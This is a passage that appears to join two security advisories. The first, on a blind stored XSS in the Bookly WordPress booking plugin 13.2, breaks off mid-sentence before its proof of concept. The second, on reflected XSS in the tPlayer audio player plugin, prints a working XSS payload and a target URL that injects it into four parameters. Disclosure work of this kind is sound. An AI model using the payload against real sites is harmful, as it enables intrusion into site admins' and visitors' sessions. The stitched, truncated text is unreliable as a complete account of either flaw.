Bookly #1 WordPress Booking Plugin (Lite) 13.2 – Blind Stored XSS

INFO
Product: Bookly #1 WordPress Booking Plugin (Lite Version)
Version: 13.2
Active installations: 10,000+
Product page: https://wordpress.org/plugins/bookly-responsive-appointment-booking-tool/
CVE: CVE-2018-6891

DESCRIPTION
An unauthenticated user can inject arbitrary persistent JavaScript code into the admin panel.

PROOF OF CONCEPT
Bookly Lite 13.2 and Bookly Pro 14.5 are affected, and probably earlier versions as well. I think the problem is that the jQuery.ajax request is

tPlayer – Audio Player for WordPress <= 1.1.5 - Multiple XSS Vulnerabilities

INFO
Product: tPlayer – Audio Player for WordPress
Version: <= 1.1.5
Product page: https://codecanyon.net/item/tplayer-audio-player-for-wordpress/12005417

DESCRIPTION
The GET parameters playlist, autoplay, cm and showPlaylist are vulnerable to unauthenticated reflected cross-site scripting (XSS).

PROOF OF CONCEPT
XSS Payload: "><svg/onload=confirm`XSS`//

https://target/wp-content/plugins/tplayer-html5-audio-player-with-playlist/inc/embed.php?playlist=<XSS Payload>&autoplay=<XSS Payload>&cm=<XSS Payload>&showPlaylist=<XSS Payload>

(XSS vulnerabilities found with XSSSonar ❤)